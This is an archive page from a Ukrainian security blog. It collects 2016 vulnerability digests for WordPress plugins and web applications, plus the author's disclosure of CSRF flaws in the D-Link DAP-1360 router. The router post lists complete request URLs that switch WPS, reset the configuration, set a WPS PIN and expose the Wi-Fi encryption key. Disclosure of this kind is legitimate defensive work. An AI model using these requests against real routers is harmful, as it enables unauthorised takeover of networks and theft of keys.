Архів для категорії 'Уразливості'

Уразливості в плагінах для WordPress №212

23:59 23.02.2016

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WPML, Reflex Gallery, Yoast Google Analytics, Ajax Search Pro, AB Google Map Travel. Для котрих з’явилися експлоіти.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

20:01 23.02.2016

В даній добірці уразливості в веб додатках:

Уразливості в плагінах для WordPress №211

23:58 29.01.2016

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Pie Register, Huge IT Slider, WPML, Yoast SEO і темі Fraction. Для котрих з’явилися експлоіти.

  • WordPress Fraction Theme 1.1.1 Privilege Escalation (деталі)
  • WordPress Pie Register 2.0.14 Cross Site Scripting (деталі)
  • WordPress Huge IT Slider 2.6.8 SQL Injection (деталі)
  • WordPress WPML XSS / Deletion / SQL Injection (деталі)
  • WordPress SEO By Yoast 1.7.3.3 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:21 28.01.2016

В даній добірці уразливості в веб додатках:

  • ClassLoader manipulation issue confirmed for Struts 1 (деталі)
  • Struts 1 - Mitigation Advice Available, Possible RCE Impact (деталі)
  • drupal7 security update (деталі)
  • Multiple SQL Injection in SP Client Document Manager plugin (деталі)
  • Struts 2.3.16.3 GA release available - security fix (деталі)

Нові CSRF уразливості в D-Link DAP-1360

20:09 27.01.2016

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).

CSRF (WASC-09):

В розділі Wi-Fi - WPS можна змінити параметр WPS Enable:

Увімкнути:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:true}}

Вимкнути:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:false,%22WscConfigured%22:true}}

Можна відмінити конфігурацію (Reset to unconfigured):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:false}}

Можна прочитати дані про конфігурацію в Information - Refresh. Через XSS атаку з цієї сторінки можна отримати дані про ключ Encryption key (це спрацює навіть при вимкненому WPS):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0

Можна змінити метод в Connection - WPS Method:

PBC:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PBC%22}}

PIN:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PIN%22,%22WscPin%22:%2211111111%22}}

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Добірка уразливостей

17:28 26.01.2016

В даній добірці уразливості в веб додатках:

  • HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access, Execution of Arbitrary Code (деталі)
  • Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension (деталі)
  • Multiple SQL Injections in Dolibarr ERP & CRM (деталі)
  • Vulnerability in php-ZendFramework (деталі)
  • Struts 2.3.16.2 GA release available - security fix (деталі)

Уразливості в плагінах для WordPress №210

23:54 23.01.2016

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Newsletter, Download Manager, Yoast Google Analytics і темі Daily Edition. Для котрих з’явилися експлоіти.

  • WordPress Newsletter 2.6.x / 2.5.x Open Redirect (деталі)
  • WordPress Download Manager 2.7.2 Privilege Escalation (деталі)
  • WordPress Yoast Google Analytics 5.3.2 Cross Site Scripting (деталі)
  • WordPress Daily Edition 1.6.2 SQL Injection (деталі)
  • WordPress Daily Edition Theme 1.6.2 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:28 21.01.2016

В даній добірці уразливості в веб додатках:

  • HP Database and Middleware Automation, Disclosure of Information (деталі)
  • Cross Site Scripting in phpMemcachedAdmin <=1.2.2 (деталі)
  • Multiple Unauthenticated SQL Injections in Gogs (деталі)
  • XSS in Gogs Markdown Renderer (деталі)
  • Sitepark Information Enterprise Server Unauthenticated Access (деталі)

Уразливості в плагінах для WordPress №209

23:59 20.01.2016

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP All, Calculated Fields Form, Contact Form DB, Max Banner Ads і темах Ya’aburnee, Dignitas. Для котрих з’явилися експлоіти.

  • WordPress WP All 3.2.3 Shell Upload (деталі)
  • WordPress Calculated Fields Form 1.0.10 SQL Injection (деталі)
  • WordPress Contact Form DB 2.8.29 Cross Site Request Forgery (деталі)
  • WordPress Ya’aburnee / Dignitas Privilege Escalation (деталі)
  • WordPress Max Banner Ads 1.9 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:26 19.01.2016

В даній добірці уразливості в веб додатках:

  • HP Universal Configuration Management Database Integration Service, Remote Code Execution (деталі)
  • Modx CMS CSRF Bypass & XSS Vulnerabilities (деталі)
  • Ahrareandeysheh CMS Cross-Site Scripting Vulnerability (деталі)
  • RCE in phpMemcachedAdmin <=1.2.2 (деталі)
  • RSA Access Manager Sensitive Information Disclosure Vulnerability (деталі)